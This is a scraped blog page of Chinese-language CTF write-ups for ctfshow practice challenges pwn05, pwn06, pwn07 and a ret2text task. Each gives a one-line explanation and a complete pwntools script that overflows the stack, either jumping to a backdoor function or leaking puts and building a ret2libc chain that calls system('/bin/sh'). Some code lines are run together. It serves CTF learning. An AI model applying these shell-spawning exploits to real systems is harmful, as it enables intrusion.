PWN-PRACTICE-CTFSHOW-2

  • pwn05
  • pwn06
  • pwn07
  • 01栈溢出之ret2text

pwn05

栈溢出,覆盖返回地址为后门函数getFlag起始地址即可

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28091)
elf=ELF("./pwn1")getFlag=0x08048486
payload="a"*0x14+"bbbb"+p32(getFlag)
io.sendline(payload)io.interactive()

pwn06

栈溢出,覆盖返回地址为后门函数getFlag起始地址即可

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28011)
elf=ELF("./pwn1")getFlag=0x400577
ret=0x40044e
payload="a"*0xC+"b"*8+p64(ret)+p64(getFlag)
io.sendline(payload)io.interactive()

pwn07

栈溢出,ret2libc

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28098)
elf=ELF("./pwn1")puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
main_addr=0x40061F
pop_rdi=0x4006e3
ret=0x4004c6#gdb.attach(io,"b * 0x40061D")
#pause()payload="a"*0xc+"b"*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
io.sendline(payload)
puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("puts_addr=="+hex(puts_addr))
libc_base=puts_addr-0x0809c0
system=libc_base+0x04f440
binsh=libc_base+0x1b3e9apayload="a"*0xc+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)+p64(main_addr)
io.sendline(payload)#pause()io.interactive()

01栈溢出之ret2text

栈溢出
覆盖返回地址为后门函数ctfshow起始地址即可

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28184)
elf=ELF("./pwn1")ctfshow=0x400637
ret=0x4004fe
payload="a"*0x80+"b"*8+p64(ret)+p64(ctfshow)
io.sendline(payload)io.interactive()

PWN-PRACTICE-CTFSHOW-2相关推荐

  1. CTFshow——Pwn(1)

    CTFshow--Pwn(1) 有点懒不想写write up了.只有exploit. PWN签到题 from pwn import * p = remote('xxx',xxx) p.interact ...

  2. ctfshow pwn——PWN签到题、pwn02

    PWN PWN签到题 pwn02 PWN签到题 nc连上就行了 pwn02 check一下是32位,用32位ida打开看看 很直白的pwnme函数 9字节的空间读入了50字节,产生了栈溢出 用pwnd ...

  3. CTF比赛PWN题sgtlibc通用快速解题框架

    CTF比赛PWN题sgtlibc通用快速解题框架 安装 开源地址:https://github.com/serfend/sgtlibc 使用 pip install sgtlibc -U 安装pwn解 ...

  4. CTFshow 击剑杯 部分WP

    摆烂了摆烂了 太难了 聪明的师傅已经组队打起月赛了 试试能不能苟住前5 苟住了 复现的后面再补充吧 文章目录 1.Misc 中文识别带师 2.Web 简单的验证码 easyPOP 3.Pwn pwn0 ...

  5. CTFSHOW 套娃shell

    CTFSHOW 套娃shell 1.题目给的是用nc连接的,测试了下,传个请求包过去就可以了,比如(最后的换行不要忘了): GET /?file=/a HTTP/1.1 Host: 127.0.0.1 ...

  6. [ CTF ] WriteUp- 20221003 CTFShow新(脑洞)手(套路)杯

    目录 [Misc]哇库哇库 [Misc]显卡坏了 赛后看官方wp给的脚本: [Web]easy_eval [Web]repairman [Crypto]easy_base [Crypto]天知地知(赛 ...

  7. ctfshow愚人节欢乐赛wp(部分)

    目录 特殊base 凌晨四点的ctfshow php的简单RCE 以旧换新(签退-送分) 暴躁的zip Easy_game 这次月赛拿了个第十二,差一丢丢,只能说凌晨四点赚到了,下面这些是我比赛的时候 ...

  8. ctfshow吃瓜杯 八月群赛 WriteUp/WP

    Web: shellme 题目问题,没什么说的,进去直接搜ctfshow就是flag 热身 签到题,做过web入门的都应该知道怎么绕,分开来看 比如第一个部分可以用小数绕过,第二部分没有字母,可以用8 ...

  9. Hitcon 2016 Pwn赛题学习

    PS:这是我很久以前写的,大概是去年刚结束Hitcon2016时写的.写完之后就丢在硬盘里没管了,最近翻出来才想起来写过这个,索性发出来 0x0 前言 Hitcon个人感觉是高质量的比赛,相比国内的C ...

  10. HDU1089-1096 A+B for Input-Output Practice 系列问题(输入输出格式练习)

    HDU1089 A+B for Input-output Practice (1) 问题描述:每行输入一对整数a和b,每行对应输出a与b的和. Sample Input 1 5 10 20 Sampl ...

最新文章

  1. JDBC:使用连接池管理连接
  2. 线上飙升800%,load达到12的解决过程
  3. 重构alert,confirm
  4. java+jsp+sqlserver 2008+Tomcat实现一个简单的搜索引擎
  5. 模态对话框和全选反选
  6. 六、PHP框架Laravel学习笔记——响应设置和重定向
  7. MySQL修改,表结构大幅修改
  8. Jaakko isalo谈《愤怒的小鸟》创意来源
  9. html当前行突出显示,Pandas Dataframes to_html:突出显示表行
  10. 数据工作者必备工作技能:数据治理
  11. 触发器详解——(一)D触发器
  12. 数学分析教程(科大)——2.8笔记+习题
  13. Chives 集群收割机图文说明
  14. CorelDRAW2021标准版 序列号授权码
  15. 教师使用计算机的能力提升,计算机专业教师教学能力提升途径
  16. IT猎头之挖角与反挖角
  17. 如何在浏览器中打开jupyter notebook
  18. 分布式系统-共识协议
  19. opencv+directshow采集视频图像
  20. 最好的网络拓扑制作软件

热门文章

  1. Objective-C 学习笔记
  2. 基于easyX的颜色侵略小游戏
  3. Ext scope 学习
  4. 基于知识图谱的问答系统实践
  5. nlp中的经典模型(三)
  6. linux 进入一个中文乱码的目录的方法
  7. linux命令 sed 有的功能有,Linux命令:sed简介
  8. 自动打包linux,Linux环境下Springboot自动打包发布功能
  9. C#中的变量类型(值类型、引用类型)
  10. python 导入包 作用域_Python 包、模块、函数、变量作用域